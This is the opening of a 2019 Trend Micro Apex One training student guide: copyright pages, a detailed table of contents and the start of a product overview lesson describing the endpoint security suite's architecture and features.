You are on page 1of 550

Trend Micro™ Apex One

Training for Certified Professionals


eBook
Copyright © 2019 Trend Micro Incorporated. All rights reserved.

Trend Micro, the Trend Micro t-ball logo, InterScan, VirusWall, ScanMail, ServerProtect,
and TrendLabs are trademarks or registered trademarks of Trend Micro Incorporated.
All other product or company names may be trademarks or registered trademarks of
their owners.

Portions of this manual have been reprinted with permission from other Trend Micro
documents. The names of companies, products, people, characters, and/or data
mentioned herein are fictitious and are in no way intended to represent any real
individual, company, product, or event, unless otherwise noted. Information in this
document is subject to change without notice.

No part of this publication may be reproduced, photocopied, stored in a retrieval system,


or transmitted without the express prior written consent of Trend Micro Incorporated.

Released: July 29, 2019


Trend Micro Apex One
Courseware v2
Trend Micro Apex One™
Training for Certified Professionals
Student Guide
Copyright © 2019 Trend Micro Incorporated. All rights reserved.

Trend Micro, the Trend Micro t-ball logo, InterScan, VirusWall, ScanMail, ServerProtect,
and TrendLabs are trademarks or registered trademarks of Trend Micro Incorporated.
All other product or company names may be trademarks or registered trademarks of
their owners.

Portions of this manual have been reprinted with permission from other Trend Micro
documents. The names of companies, products, people, characters, and/or data
mentioned herein are fictitious and are in no way intended to represent any real
individual, company, product, or event, unless otherwise noted. Information in this
document is subject to change without notice.

No part of this publication may be reproduced, photocopied, stored in a retrieval system,


or transmitted without the express prior written consent of Trend Micro Incorporated.

Released: July 29, 2019


Trend Micro Apex One
Courseware v2
Trend Micro Apex One Training for Certified Professionals - Student Guide

Table of Contents
Lesson 1: Trend Micro Apex One Overview ................................................................................ 1
Trend Micro Solutions ............................................................................................................................................... 1
Network Defense ................................................................................................................................................ 1
Hybrid Cloud Security ...................................................................................................................................... 2
User Protection .................................................................................................................................................. 2
Trend Micro Smart Protection Network ...................................................................................................... 2
Visibility and Control ........................................................................................................................................ 3
Trend Micro XGen™ Security ................................................................................................................................. 3
Smart .................................................................................................................................................................... 3
Optimized ............................................................................................................................................................ 3
Connected ........................................................................................................................................................... 4
Trend Micro Apex One ............................................................................................................................................. 4
Key Features of Trend Micro Apex One .............................................................................................................. 5
Malware Protection........................................................................................................................................... 5
Ransomware Protection .................................................................................................................................. 5
Predictive Machine Learning .......................................................................................................................... 5
Behavior Monitoring ......................................................................................................................................... 5
Connected Threat Defense ............................................................................................................................. 6
Web Threat Protection ..................................................................................................................................... 6
Firewall Protection ............................................................................................................................................ 6
Data Loss Prevention ....................................................................................................................................... 6
Device Control .................................................................................................................................................... 6
Outbreak Control ............................................................................................................................................... 6
Application Control ........................................................................................................................................... 7
Virtual Patching ................................................................................................................................................. 7
Endpoint Detection and Response ................................................................................................................ 7
Endpoint Encryption ......................................................................................................................................... 7
Cloud-Based Intelligence ................................................................................................................................. 7
Automated Updates .......................................................................................................................................... 7
Multi-Platform Support .................................................................................................................................... 7
Simplified Administration ................................................................................................................................ 8
Off-Premise Management ............................................................................................................................... 8
Unified Agent ...................................................................................................................................................... 8
Trend Micro Apex One Components .................................................................................................................... 9
Apex One Server ................................................................................................................................................ 9
Apex One (Mac) Server ...................................................................................................................................10
Database .............................................................................................................................................................10
Microsoft Internet Information Server ........................................................................................................10
Apex One/Apex One (Mac) Web Management Console ..........................................................................10
Apex Central ......................................................................................................................................................10
Security Agents ................................................................................................................................................. 11
Apex One Edge Relay Server .......................................................................................................................... 11
Trend Micro Smart Protection Network ...................................................................................................... 11
Smart Protection Server ................................................................................................................................. 11
Trend Micro ActiveUpdate Server ................................................................................................................. 11
Update Agents .................................................................................................................................................... 11
Trend Micro Endpoint Encryption ................................................................................................................ 12
Deep Discovery Analyzer ............................................................................................................................... 12
Mac Sandbox ...................................................................................................................................................... 12
Software as a Service Components ............................................................................................................. 12
Optional Third-Party Components ............................................................................................................... 13

© 2019 Trend Micro Inc. Education i


Trend Micro Apex One Training for Certified Professionals - Student Guide

Trend Micro Apex One Deployment Methods ................................................................................................... 13


On-Premise Apex One Server ........................................................................................................................ 13
Apex One as a Service ..................................................................................................................................... 13
Threat Detection ......................................................................................................................................................14
Detecting Threats at the Entry Point ..........................................................................................................14
Detecting Threats Pre-execution .................................................................................................................14
Detecting Threats at Runtime .......................................................................................................................15
Detecting Threats at the Exit Point .............................................................................................................15

Lesson 2: Trend Micro Apex One Server ..................................................................................17


Apex One Server Tasks .......................................................................................................................................... 17
Apex One Server Services and Components ....................................................................................................18
Web Server .........................................................................................................................................................19
Apex One (Mac) Plug-in ..................................................................................................................................20
Configuration Repositories ...................................................................................................................................20
Apex One Database ................................................................................................................................................. 21
Installing the Apex One Server ............................................................................................................................. 21
Hardware Requirements ................................................................................................................................22
Apex One Server Pre-Installation Checklist ..............................................................................................22
Downloading Apex One Server for Windows ............................................................................................22
Running the Setup ........................................................................................................................................... 23
Installation Logs ..............................................................................................................................................35
Confirming Successful Installation ..............................................................................................................35
Ports and Protocols to Allow ........................................................................................................................36
Upgrading to Apex One ......................................................................................................................................... 37
Upgrading OfficeScan as a Service to Apex One as a Service ............................................................. 37
Upgrading OfficeScan to Apex One (on-premise) ................................................................................... 37
Upgrading OfficeScan (on-premise) to Apex One as a Service ............................................................41
Upgrading OfficeScan Agents to Apex One Security Agents ...............................................................42
Pre-Upgrade Backup Considerations ..........................................................................................................43
Migrating Apex One Servers ............................................................................................................................... 44
Server Service Setup Utility ................................................................................................................................ 46
Apex One (Mac) .......................................................................................................................................................47
Installing the Apex One (Mac) Plug-In ....................................................................................................... 48
Apex One Plug-Ins .................................................................................................................................................. 50
Apex One Data Protection ........................................................................................................................... 50
Trend Micro Endpoint Encryption Deployment Tool ............................................................................. 50
Apex One (Mac) ............................................................................................................................................... 50
Trend Micro Virtual Desktop Support ....................................................................................................... 50
Trend Micro Apex One Toolbox ....................................................................................................................51
Apex One Utilities ....................................................................................................................................................51
Authentication Certificate Manager ............................................................................................................51
Agent Packager ................................................................................................................................................51
Cisco Trust Agent .............................................................................................................................................51
Domains Schedule Update ............................................................................................................................52
Edge Relay Server Installer ...........................................................................................................................52
Gateway Settings Importer ...........................................................................................................................52
Image Setup ......................................................................................................................................................52
Agent Mover .....................................................................................................................................................53
Integrated Service Package ..........................................................................................................................53
Integrated Smart Protection Server Tool .................................................................................................53
Device List Tool ................................................................................................................................................53
Message Queue ................................................................................................................................................53
Console Password Reset Tool ..................................................................................................................... 54

ii © 2019 Trend Micro Inc. Education


Trend Micro Apex One Training for Certified Professionals - Student Guide

Plug-in Manager Installer ............................................................................................................................. 54


Apex One Settings Export Tool ................................................................................................................... 54
Apex One Server Migration Tool ................................................................................................................ 54
ServerProtect Normal Server Migration Tool ......................................................................................... 54
Server Tuner .....................................................................................................................................................55
Apex One VDI Pre-Scan Template Generation Tool ...............................................................................55
System Health Validator ................................................................................................................................55
Trend Micro Vulnerability Scanner .............................................................................................................55
Cache Generator ..............................................................................................................................................55
Touch Tool .........................................................................................................................................................56
Decrypt Tool .....................................................................................................................................................56

Lesson 3: Trend Micro Apex One Web Management Console ........................................... 57


Logging into the Web Management Console .................................................................................................. 58
Web Management Console Communication .............................................................................................59
Login Process .................................................................................................................................................. 60
Certificate warnings ...................................................................................................................................... 60
Timeout Mechanism .........................................................................................................................................61
Automatic Refresh ..........................................................................................................................................62
Active Directory Integration ................................................................................................................................62
Apex One Active Directory Integration Service .......................................................................................63
Authenticating Administrative Users From Active Directory ............................................................. 64
Administrative Accounts ...................................................................................................................................... 64
Defining User Roles .........................................................................................................................................65
Configuring User Accounts ...........................................................................................................................67
Domain permissions ........................................................................................................................................70
Recovering From Forgotten Passwords ............................................................................................................. 71

Lesson 4: Security Agents ...........................................................................................................73


Security Agent Tasks ............................................................................................................................................. 73
Security Agent Services and Components .......................................................................................................74
Security Agent Tree ...............................................................................................................................................76
Security Agent System Requirements .............................................................................................................. 77
Hardware Requirements ................................................................................................................................ 77
Installing Security Agents .....................................................................................................................................78
Security Agent Deployment Prerequisites ................................................................................................78
Remote Installation .........................................................................................................................................78
Unmanaged Endpoints .................................................................................................................................. 80
Installer Link ......................................................................................................................................................81
AutoPcc ...............................................................................................................................................................81
Agent Packager ...............................................................................................................................................82
Microsoft System Center Configuration Manager or Active Directory Installation ........................83
Agent Disk Images ...........................................................................................................................................83
Apex Central .....................................................................................................................................................83
Migrating From Other Endpoint Security Software ...................................................................................... 84
tmuninst_as.ptn .............................................................................................................................................. 84
tmuninst.ptn .................................................................................................................................................... 85
Coexist Mode ................................................................................................................................................... 85
Post Installation Tasks .......................................................................................................................................... 86
Component Updates ...................................................................................................................................... 86
Test Scan using EICAR Test Script ............................................................................................................. 86
Installation Logs ............................................................................................................................................. 86
Agent-To-Server Communication .......................................................................................................................87

© 2019 Trend Micro Inc. Education iii


Trend Micro Apex One Training for Certified Professionals - Student Guide

Server-to-Agent Communication ....................................................................................................................... 88


Authenticating Server-Initiated Communications .................................................................................. 90
Support for third-party certificates .............................................................................................................91
Using a Single Key With Multiple Apex One Servers ...............................................................................91
Heartbeat ...................................................................................................................................................................91
Server Polling ...................................................................................................................................................92
Agent Connection Status ........................................................................................................................................ 2
Online .................................................................................................................................................................92
Offline .................................................................................................................................................................92
Independent ......................................................................................................................................................93
Off-premises .....................................................................................................................................................93
Endpoint Location ...................................................................................................................................................93
Reference Server List ................................................................................................................................... 94
Gateways ...........................................................................................................................................................95
Moving Agents Between Apex One Servers .....................................................................................................96
Agent Mover Tool ............................................................................................................................................96
Uninstalling Security Agents ............................................................................................................................... 98
Uninstalling From the Web Management Console ................................................................................. 98
Uninstalling from Windows Control Panel ................................................................................................ 98
Uninstalling Manually .....................................................................................................................................99
Custom Uninstall Tool ....................................................................................................................................99
Removing Inactive Agents ....................................................................................................................................99
Security Agent Settings ...................................................................................................................................... 100
Root Settings .................................................................................................................................................. 100
Domain Settings .............................................................................................................................................. 101
Agent Settings ................................................................................................................................................ 101
Agent Grouping ..................................................................................................................................................... 102
Manual Grouping ............................................................................................................................................ 102
Automatic Grouping ...................................................................................................................................... 102
Viewing Agent Status .......................................................................................................................................... 104
Viewing Agent Status on the Endpoint .................................................................................................... 104
Viewing Agent Status in the Web Management Console .................................................................... 106
Agent Self Protection .......................................................................................................................................... 106
Configuring Unauthorized Change Prevention ...................................................................................... 107
Kernel Mode Termination Protection ...................................................................................................... 109
Security Agent Service Restart ................................................................................................................. 109
Agent Privileges ..................................................................................................................................................... 110
Independent Mode Privileges ........................................................................................................................111
Scan Type Privileges ......................................................................................................................................113
Firewall Privileges ...........................................................................................................................................113
Behavior Monitoring Privileges ................................................................................................................... 114
Trusted Program List Privilege ................................................................................................................... 114
Mail Scan Privileges ........................................................................................................................................115
Proxy Configuration Privileges ....................................................................................................................115
Update Privileges ........................................................................................................................................... 116
Agent Unloading and Unlocking Privilege ................................................................................................ 116
Agent Uninstallation Privilege ......................................................................................................................117

Lesson 5: Managing Off-Premise Agents .............................................................................. 119


Edge Relay Server and External Agent Communications ........................................................................... 120
Installing the Apex One Edge Relay Server ......................................................................................................121
Registering the Edge Relay Server ................................................................................................................... 125
Viewing Off-Premise Agents ........................................................................................................................127
Apex One Relay Server Digital Certificates .....................................................................................................127

iv © 2019 Trend Micro Inc. Education


Trend Micro Apex One Training for Certified Professionals - Student Guide

Renewing Edge Relay Server Certificate ................................................................................................. 128

Lesson 6: Keeping Trend Micro Apex One Up To Date ....................................................... 129


ActiveUpdate ......................................................................................................................................................... 129
ActiveUpdate Integrity ................................................................................................................................. 129
Pattern Updates ............................................................................................................................................. 130
Incremental Updates .................................................................................................................................... 130
ActiveUpdate Logs ..........................................................................................................................................30
Updating the Apex One Server ............................................................................................................................131
Manual Server Updates ..................................................................................................................................131
Scheduled Server Update .............................................................................................................................132
Server Update Source ...................................................................................................................................132
Updating Security Agents ....................................................................................................................................133
Automatic Updates ........................................................................................................................................133
Manual Updates ............................................................................................................................................. 134
Privilege-based Updates .............................................................................................................................. 135
Agent Update Source ................................................................................................................................... 135
Update Agents ....................................................................................................................................................... 136
Promoting an Agent to an Update Agent .................................................................................................137
Update Components ..................................................................................................................................... 138
Downloading and Deploying Updates .............................................................................................................. 139
Security Compliance ............................................................................................................................................ 140
Services ............................................................................................................................................................ 140
Components ..................................................................................................................................................... 141
Scan Compliance ........................................................................................................................................... 142
Settings ............................................................................................................................................................ 143
Update Summary ........................................................................................................................................... 144
Rollback ........................................................................................................................................................... 145
Server Tuner Tool ................................................................................................................................................. 146
Download Settings ........................................................................................................................................ 147
Network Traffic Settings ............................................................................................................................. 147
Default Settings ............................................................................................................................................. 147
Recommended Configurations for Improved Performance ............................................................... 148
Update Utilities ...................................................................................................................................................... 148
Domains Schedule Update Tool ................................................................................................................. 148
Scheduled Update Configuration Tool ..................................................................................................... 148

Lesson 7: Trend Micro Smart Protection ...............................................................................149


File Reputation Services .............................................................................................................................. 149
Web Reputation Services ............................................................................................................................ 149
Predictive Machine Learning Services ..................................................................................................... 150
Census Service ............................................................................................................................................... 150
Certified Safe Software Service ................................................................................................................ 150
Smart Feedback ...............................................................................................................................................151
Service URLs ....................................................................................................................................................151
Smart Protection Sources .................................................................................................................................. 152
Trend Micro Smart Protection Network .................................................................................................. 152
Smart Protection Server ............................................................................................................................. 152
Configuring the Agent Smart Protection Source .......................................................................................... 155

Lesson 8: Protecting Endpoint Computers From Malware ............................................... 157


Scanning for Malware .......................................................................................................................................... 157
NT Real-time Scan Service .......................................................................................................................... 157

© 2019 Trend Micro Inc. Education v


Trend Micro Apex One Training for Certified Professionals - Student Guide

Scan Settings ......................................................................................................................................................... 158


Real-Time Scan Settings .............................................................................................................................. 159
Manual Scan Settings ................................................................................................................................... 167
Scheduled Scan Settings ...............................................................................................................................171
Scan Now Settings ........................................................................................................................................ 174
Trusted Program List 1 .................................................................................................................................... 77
Scan Caching ...................................................................................................................................................177
Quarantining Detected Malware ....................................................................................................................... 179
Restoring Quarantined Files ....................................................................................................................... 180
Central Quarantine Restore ......................................................................................................................... 181
Smart Scan .............................................................................................................................................................. 181
File Reputation ............................................................................................................................................... 182
External CRC Database ................................................................................................................................ 184
CRC Caching ................................................................................................................................................... 186
Spyware/Grayware Protection .......................................................................................................................... 188
VSAPI ................................................................................................................................................................ 188
SSAPI ................................................................................................................................................................ 188
Damage Cleanup Services ........................................................................................................................... 190
Damage Cleanup Services Components ................................................................................................... 191
Assessment Mode ........................................................................................................................................... 191
Preventing Outbreaks .......................................................................................................................................... 192
Outbreak Prevention Policy ........................................................................................................................ 192
Outbreak Notifications ................................................................................................................................. 193
Starting Outbreak Prevention .................................................................................................................... 194
Terminating Outbreak Prevention ............................................................................................................ 196

Lesson 9: Protecting Endpoint Computers Through Behavior Monitoring ................... 197


Behavior Monitoring ............................................................................................................................................. 197
Malware Behavior Blocking ......................................................................................................................... 198
Ransomware Protection .............................................................................................................................. 199
Anti-Exploit Protection ................................................................................................................................200
Fileless Malware Protection ......................................................................................................................200
Newly Encountered Program Protection ............................................................................................... 203
Event Monitoring .......................................................................................................................................... 205
Behavior Monitoring Exception List ................................................................................................................ 207

Lesson 10: Protecting Endpoint Computers From Unknown Threats ............................209


Common Vulnerabilities and Exposures Exploits ......................................................................................... 209
Supported File Types .................................................................................................................................... 210
Predictive Machine Learning ............................................................................................................................. 210
File Detections ..................................................................................................................................................211
Process Detections ........................................................................................................................................212
Enabling Predictive Machine Learning .............................................................................................................212
Exceptions ........................................................................................................................................................213
Connection Settings ......................................................................................................................................213
Offline Predictive Machine Learning ............................................................................................................... 215
Predictive Machine Learning Local File Model ....................................................................................... 215

Lesson 11: Blocking Web Threats .............................................................................................. 217


Web Reputation ......................................................................................................................................................217
Credibility Scores .......................................................................................................................................... 219
Configuring Web Reputation Settings ...................................................................................................... 219
Untested URLs ................................................................................................................................................221

vi © 2019 Trend Micro Inc. Education


Trend Micro Apex One Training for Certified Professionals - Student Guide

Sample Sites ...................................................................................................................................................222


Dealing With False Positives .......................................................................................................................222
Intercepting HTTPS Traffic .........................................................................................................................222
Bypassing Web Reputation Analysis ........................................................................................................ 224
URL Analysis Order .......................................................................................................................................227
Assessment Mode ......................................................................................................................................... 228
Detecting Suspicious Connections .................................................................................................................. 228
Detecting Connections Through the Global C&C List .......................................................................... 228
Protecting Against Browser Exploits .............................................................................................................. 229

Lesson 12: Protecting Endpoint Computers Through Traffic Filtering ........................... 231
Traffic Filtering .......................................................................................................................................................231
Firewall Filtering .............................................................................................................................................231
Application Filtering ......................................................................................................................................232
Certified Safe Software List .......................................................................................................................232
Stateful Inspection ........................................................................................................................................232
Intrusion Detection System ........................................................................................................................232
Enabling the Apex One Firewall .........................................................................................................................233
Enabling the Apex One Firewall on Selected Endpoints ......................................................................233
Firewall Policies and Profiles ............................................................................................................................ 234
Firewall Policies ............................................................................................................................................ 234
Firewall Profiles .............................................................................................................................................237
Viewing Firewall Rules ................................................................................................................................ 240

Lesson 13: Preventing Data Leaks on Endpoint Computers ............................................. 243


Data Loss Prevention .......................................................................................................................................... 243
Installing Data Protection ........................................................................................................................... 244
Digital Asset Control ........................................................................................................................................... 247
Data Identifiers ............................................................................................................................................. 247
Data Loss Prevention Templates ............................................................................................................. 249
Data Loss Prevention Policies ................................................................................................................... 250
Detecting Digital Assets .............................................................................................................................. 254
Data Loss Prevention Logging .................................................................................................................. 255
Forensic Folder and DLP Database .......................................................................................................... 255
Device Control ...................................................................................................................................................... 255
USB Exception List ....................................................................................................................................... 258

Lesson 14: Deploying Policies Through Trend Micro Apex Central ................................. 261
Apex Central ........................................................................................................................................................... 261
Apex Central Services ......................................................................................................................................... 262
Apex Central Management Modes ................................................................................................................... 263
On-premise Management Mode ................................................................................................................ 263
Cloud Management Mode ........................................................................................................................... 263
Hybrid Mode ................................................................................................................................................... 264
Managing Apex One Policies in Apex Central ............................................................................................... 265
Connecting Apex One and Apex Central ................................................................................................ 265
Creating an Apex Central User Account ................................................................................................. 267
Adding Apex One to the Apex Central Product Directory .................................................................. 269
Selecting the Destination Product .............................................................................................................271
Identifying Policy Targets ...........................................................................................................................272
Defining Policy Settings .............................................................................................................................. 274
Deploying the Policy .................................................................................................................................... 275
Policy Inheritance ................................................................................................................................................ 276

© 2019 Trend Micro Inc. Education vii


Trend Micro Apex One Training for Certified Professionals - Student Guide

Inherit From Parent ..................................................................................................................................... 276


Are Customizable ..........................................................................................................................................277
Extend from parent .......................................................................................................................................277
Data Discovery Policies .......................................................................................................................................277
Data Discovery ...............................................................................................................................................277
Data Discovery Policy Management .........................................................................................................277
Incident Investigation ................................................................................................................................... 281

Lesson 15: Detecting Emerging Malware Through Connected Threat Defense ......... 283
Detect .............................................................................................................................................................. 284
Respond .......................................................................................................................................................... 284
Protect ............................................................................................................................................................ 284
Visibility and control .................................................................................................................................... 284
Connected Threat Defense Requirements .................................................................................................... 284
How Connected Threat Defense Works .......................................................................................................... 285
Suspicious Activities .................................................................................................................................... 286
Deep Discovery Analyzer ................................................................................................................................... 286
Connecting Deep Discovery Analyzer to Apex Central ....................................................................... 287
Adding Deep Discover Analyzer to the Apex Central Product Directory ....................................... 288
Suspicious Objects ............................................................................................................................................... 290
Submitting Samples ..................................................................................................................................... 290
Analyzing Samples ....................................................................................................................................... 290
Distributing Suspicious Object Details ..................................................................................................... 291
Mitigating Threats ......................................................................................................................................... 291
Subscribing Apex One to the Suspicious Objects List ................................................................................. 291
Tracking Suspicious Objects ............................................................................................................................. 293

Lesson 16: Blocking Unapproved Applications on Endpoint Computers ....................... 297


Integrated Application Control ........................................................................................................................ 297
Lockdown Mode .................................................................................................................................................... 297
Application Control Criteria .............................................................................................................................. 298
File Hash ......................................................................................................................................................... 298
File Paths ........................................................................................................................................................ 300
Digital Certificates ......................................................................................................................................... 301
Certified Safe Software List ...................................................................................................................... 304
Gray Software List ....................................................................................................................................... 305
Implementing Application Control ................................................................................................................... 306
Defining the Application Control Criteria ............................................................................................... 306
Creating the Policy ..........................................................................................................................................07
Specifying the Security Agents That Will be Implementing the Policy ............................................ 310
Deploy the policy .............................................................................................................................................311
User-based Application Control .........................................................................................................................312
Best Practices for Enabling Application Control ............................................................................................313
Use Learn ¬ Monitor ¬ Refine .....................................................................................................................313
Use Lockdown .................................................................................................................................................313
In-house Applications ....................................................................................................................................313
Top Blocked Applications Widget ...............................................................................................................313
Trust Permissions ...........................................................................................................................................313
Application Control Criteria Pros and Cons ............................................................................................ 314

Lesson 17: Protecting Endpoint Computers From Vulnerabilities .................................. 315


Integrated Vulnerability Protection ................................................................................................................ 315
Vulnerability Protection Pattern ....................................................................................................................... 316

viii © 2019 Trend Micro Inc. Education


Trend Micro Apex One Training for Certified Professionals - Student Guide

Vulnerability Protection Rules ....................................................................................................................317


Implementing Vulnerability Protection ........................................................................................................... 318
Creating the Policy ........................................................................................................................................ 318
Specifying the Security Agents That Will be Implementing the Policy ............................................ 319
Deploy the policy .......................................................................................................................................... 320
Network Engine Settings ......................................................................................................................................321

Lesson 18: Detecting and Investigating Security Incidents on Endpoint Computers . 323
Integrated Endpoint Sensor ..............................................................................................................................323
Enabling Endpoint Sensor .......................................................................................................................... 325
Endpoint Detection and Response ................................................................................................................... 326
Apex One Incident Response Model .................................................................................................................327
Preliminary Assessment ......................................................................................................................................327
Preliminary Investigation ........................................................................................................................... 328
Custom Intelligence ..................................................................................................................................... 330
Virtual Analyzer Suspicious Object .......................................................................................................... 335
Root Cause Analysis ............................................................................................................................................ 336
Incident Response ................................................................................................................................................ 340
Terminating Suspicious Processes .......................................................................................................... 340
Adding Processes to the Suspicious Objects List .................................................................................. 341
Isolating Endpoints ........................................................................................................................................ 341
Detailed Investigation ......................................................................................................................................... 342
Attack Discovery .................................................................................................................................................. 350
Viewing the Attack Discovery Engine Log ............................................................................................. 350
Managed Detection and Response ................................................................................................................... 351
Trend Micro Managed Detection and Response Service ..................................................................... 351
Service Components .................................................................................................................................... 353
Managed Detection and Response Service Flow .................................................................................. 353
Configuring Apex Central for Managed Detection and Response Service ..................................... 354

Appendix A: Troubleshooting Trend Micro Apex One ....................................................... 357


Debugging Security Agents ............................................................................................................................... 357
Debugging the Apex One Server ...................................................................................................................... 357
Changing the Security Agent Communication Port .................................................................................... 358
On the Security Agent ................................................................................................................................. 358
Troubleshooting Agent/Server Communication Issues ............................................................................. 359
Verify the Connection Status Manually .................................................................................................. 359
Verify the Connection Status Automatically ......................................................................................... 359
Verify the Results of the Connection Status ......................................................................................... 360
Troubleshooting Communication Issues Between Security Agent and Server ............................ 360
Verify Security Agent Registry settings ................................................................................................. 360
Confirm Correct Product Licensing .......................................................................................................... 361
Verify Agent Privileges to Communicate With the Server .................................................................. 361
Verify Internet Information Services ...................................................................................................... 362
Re-establish Communication Using autopcc.exe .................................................................................. 362
Re-establish Communication Using IpXfer.exe ..................................................................................... 363
Verify Windows Firewall Blocking ............................................................................................................ 363
Change the Agent Domain ......................................................................................................................... 364
Verify Server Hostname Resolution ........................................................................................................ 364
Troubleshooting Virus Infection ...................................................................................................................... 364
Determining the Virus Infection Channel on the Server .................................................................... 365
Determining the Virus Infection Channel on the Agent ...................................................................... 365
Determining Spyware/Grayware Infection Channel on the Server ................................................. 366

© 2019 Trend Micro Inc. Education ix


Trend Micro Apex One Training for Certified Professionals - Student Guide

Determining Spyware/Grayware Infection Channel on the Agent ................................................... 366


Troubleshooting the Firewall Service ............................................................................................................. 367
Troubleshooting the Unauthorized Change Prevention Service ............................................................. 367
Troubleshooting Edge Relay Server Certificates ......................................................................................... 368
Troubleshooting Sample Submission .............................................................................................................. 368

Appendix B: What’s New in Trend Micro Apex One ............................................................. 371


All-in-one Security Agent .....................................................................................................................................371
Offline Predictive Machine Learning .................................................................................................................371
Fileless Threat Detection Enhancements ........................................................................................................371
Integrated Vulnerability Protection ..................................................................................................................371
Integrated Application Control ...........................................................................................................................371
Investigative Capabilities ......................................................................................................................................371
Mac Protection Features .....................................................................................................................................372
Managed Detection and Response Service Support for SaaS ...................................................................372
Indicator of Attack Behavioral Analysis Enhancements .............................................................................372
Application Programming Interface Enhancements ....................................................................................372
Cloud Sandbox .......................................................................................................................................................372
Apex Central ...........................................................................................................................................................372
Kernel Mode Termination Protection ..............................................................................................................372
Location Awareness Enhancement ..................................................................................................................373

x © 2019 Trend Micro Inc. Education


Lesson 1: Trend Micro Apex One Overview

Lesson 1: Trend Micro Apex One


Overview

Lesson Objectives:

After completing this lesson, participants will be able to:


• Describe the key features of Apex One
• Identify the components in an Apex One installation and describe their purpose

Trend Micro Solutions


Trend Micro provides layered content security with interconnected solutions that share data so you can
protect your users, network, data center, and cloud resources from data breaches and targeted attacks.

NETWORK
DEFENSE

HYBRID CLOUD USER


SECURITY PROTECTION

Network Defense
The enterprise is at the cross-hairs of an increasingly complex array of ransomware, advanced
threats, targeted attacks, vulnerabilities, and exploits.

Only complete visibility into all network traffic and activity will keep the organization ahead of
purpose-built attacks which bypass traditional controls, exploit network vulnerabilities, and either
ransom or steal sensitive data, communications, and intellectual property. Trend Micro Network
Defense detects and prevents breaches anywhere on the network to protect critical data and
reputation. Rapidly detect, analyze, and respond to targeted attacks on your network. Stop targeted
email attacks, and detect advanced malware and ransomware with custom sandbox analysis, before
damage is done

© 2019 Trend Micro Inc. Education 1


Lesson 1: Trend Micro Apex One Overview

The Trend Micro Network Defense solution preserves the integrity of the network while ensuring
that data, communications, intellectual property, and other intangible assets are not monetized by
unwanted third parties. A combination of next-generation intrusion prevention and proven breach
detection enables the enterprise to prevent targeted attacks, advanced threats, and ransomware
from embedding or spreading within their network.

Hybrid Cloud Security


The Trend Micro Hybrid Cloud Security solution protects enterprise workloads in the data center and
the cloud from critical new threats, like ransomware, that can cause significant business disruptions,
while helping to accelerate regulatory compliance.

Hybrid Cloud Security delivers comprehensive, automated security for physical, virtual and cloud
servers. The organization can secure critical data and applications across their cloud and virtualized
environments with effective server protection that maximizes their operational and economic
benefits.

Whether you are focused on securing physical, virtual, cloud, or hybrid environments, Trend Micro
provides the advanced server security you need with the Trend Micro Deep Security platform.
Available as software, in the Amazon Web Services and Azure marketplace, or as a service, Deep
Security provides you with security optimized for VMware, Amazon Web Services, and Microsoft
Azure.

User Protection
The threat landscape is constantly changing, and traditional security solutions on endpoint
computers can’t keep up. Turning to multiple point products on a single endpoint results in too many
products that don’t work together, increasing complexity, slowing users, and leaving gaps in an
organization’s security.

To further complicate matters, organization are moving to the cloud and need flexible security
deployment options that will adapt as their needs change.

Trend Micro User Protection is an interconnected suite of security products and advanced threat
defense techniques that protect users from ransomware and other threats, across endpoints,
gateways and applications, allowing the organization to secure all it users' activity on any
application, any device, anywhere.

Trend Micro Smart Protection Network


The Trend Micro Smart Protection Network mines data around the clock and across the globe to
ensure up-to-the-second threat intelligence to immediately stamp out attacks before they can harm
valuable enterprise data assets.

Trend Micro rapidly and accurately collates this wealth of global threat intelligence to customize
protection to the specific needs of your home or business and uses predictive analytics to protect
against the threats that are most likely to impact you.

To maintain this immense scale of threat protection, Trend Micro has created one of the world’s
most extensive cloud-based protection infrastructures that collects more threat data from a

2 © 2019 Trend Micro Inc. Education


Lesson 1: Trend Micro Apex One Overview

broader, more robust global sensor network to ensure customers are protected from the volume
and variety of threats today, including mobile and targeted attacks. New threats are identified
quickly using finely tuned automated custom data mining tools and human intelligence to root out
new threats within very large data streams.

Visibility and Control


Whether your endpoints are internal or external, you can manage a comprehensive set of security
capabilities from one single management console providing a strong level of visibility and control. In
addition, suspicious objects discovered by different applications can be consolidated into a single list
and distributed within the entire environment.

Trend Micro XGen™ Security


Trend Micro’s endpoint protection solution, powered by XGen, delivers a blend of cross-generational
threat defense techniques that are smart, optimized, and connected to protect endpoint computers
across the enterprise – all while preventing business disruptions and helping with regulatory compliance.

Smart
Protects against the full range of known and unknown threats using a cross-generational blend of
threat defense techniques that applies the right technique at the right time, and is powered by global
threat intelligence.

Optimized
Minimizes IT impact with solutions that are specifically designed for and integrated with leading
customer platforms and applications on endpoints computers. The footprint on the client
applications is minimized to ensure a more efficient use of resources.

© 2019 Trend Micro Inc. Education 3


Lesson 1: Trend Micro Apex One Overview

Connected
Speeds time to response with automatic sharing of threat intelligence across security layers and
centralized visibility and control XGen™ security uses proven techniques to quickly identify known
good or bad data, freeing advanced techniques to more quickly and accurately identify unknown
threats. This identification in rapid succession with right-time technology regardless of location and
device across a connected system, maximizes both visibility and performance. This core set of
techniques powers each of the Trend Micro solutions, in a way that is optimized for each layer of
security: hybrid clouds, networks, and user environments.

Trend Micro Apex One


Apex One is the next evolution of the Trend Micro enterprise endpoint security solution and replaces
OfficeScan as Trend Micro’s flagship endpoint security product. Apex One can be installed as a new
product in the enterprise or upgrade OfficeScan XG to Apex One.

Apex One protects endpoint computers from malware, network viruses, Web-based threats, spyware,
and mixed threat attacks (both known and unknown). It uses a client/server architecture that consists of
a Security Agent program that resides on the endpoint and a Server program that manages all Agents.
The Agent guards the endpoint and reports on its security status to the Server. Apex One offers threat
detection, response, and investigation within a single agent on both Windows and Mac computers.

Apex Central Apex One


Web Management
Apex One Console
Server

Security Agents

The Apex One Server is capable of providing real-time, bidirectional communication between the Server
and Security Agents using Hypertext Transfer Protocol (HTTPS). The Apex One Web Management
console makes it easy for administrators to set coordinated security policies and deploy updates to
every endpoint Agent. In addition, different users access roles can be set up for specific administrative
tasks such as policy configuration, log query, and report generation.

Within the environment, Trend Micro Apex Central may also be deployed to provide centralized
management for many Trend Micro products, including Apex One. Once installed, Apex One can
integrate with Apex Central to provide additional security capabilities.

4 © 2019 Trend Micro Inc. Education


Lesson 1: Trend Micro Apex One Overview

The Apex One Server downloads components (pattern file and program updates) from the Trend Micro
ActiveUpdate Server, Apex Central, or any other server or UNC path where new patterns have been
uploaded to.

Key Features of Trend Micro Apex One


Apex One provides a wide range of endpoint computer protection features. Some of these key features
include the following:

Note: Some of these features may require additional licensing.

Malware Protection
Endpoint protection is the primary focus of Apex One. Apex One protects endpoint computers from
